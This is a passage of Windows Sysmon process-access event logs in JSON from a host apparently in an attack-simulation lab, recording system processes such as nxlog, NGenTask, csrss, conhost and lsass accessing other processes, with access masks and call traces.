C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.772\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nSourceProcessId: 4080\r\nSourceThreadId: 1636\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-001009A30900}\r\nTargetProcessId: 3528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000101404B)|UNKNOWN(0000000001013CFC)|UNKNOWN(0000000001011D03)|UNKNOWN(0000000001010B66)|UNKNOWN(000000000101054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.772","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001031860900}","SourceProcessId":"4080","SourceThreadId":"1636","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-001009A30900}","TargetProcessId":"3528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000101404B)|UNKNOWN(0000000001013CFC)|UNKNOWN(0000000001011D03)|UNKNOWN(0000000001010B66)|UNKNOWN(000000000101054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.772\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-001009A30900}\r\nTargetProcessId: 3528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.772","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-001009A30900}","TargetProcessId":"3528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.772\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001061870900}\r\nSourceProcessId: 3828\r\nSourceThreadId: 4732\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-001009A30900}\r\nTargetProcessId: 3528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.772","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001061870900}","SourceProcessId":"3828","SourceThreadId":"4732","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-001009A30900}","TargetProcessId":"3528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.819\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-001009A30900}\r\nTargetProcessId: 3528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.819","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-001009A30900}","TargetProcessId":"3528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.819\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-001009A30900}\r\nTargetProcessId: 3528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.819","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-001009A30900}","TargetProcessId":"3528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.866\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nSourceProcessId: 4080\r\nSourceThreadId: 1636\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000101404B)|UNKNOWN(0000000001013CFC)|UNKNOWN(0000000001014ADD)|UNKNOWN(0000000001012444)|UNKNOWN(0000000001010B66)|UNKNOWN(000000000101054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.866","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001031860900}","SourceProcessId":"4080","SourceThreadId":"1636","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000101404B)|UNKNOWN(0000000001013CFC)|UNKNOWN(0000000001014ADD)|UNKNOWN(0000000001012444)|UNKNOWN(0000000001010B66)|UNKNOWN(000000000101054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.866\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:02.866","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.866\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001061870900}\r\nSourceProcessId: 3828\r\nSourceThreadId: 4732\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 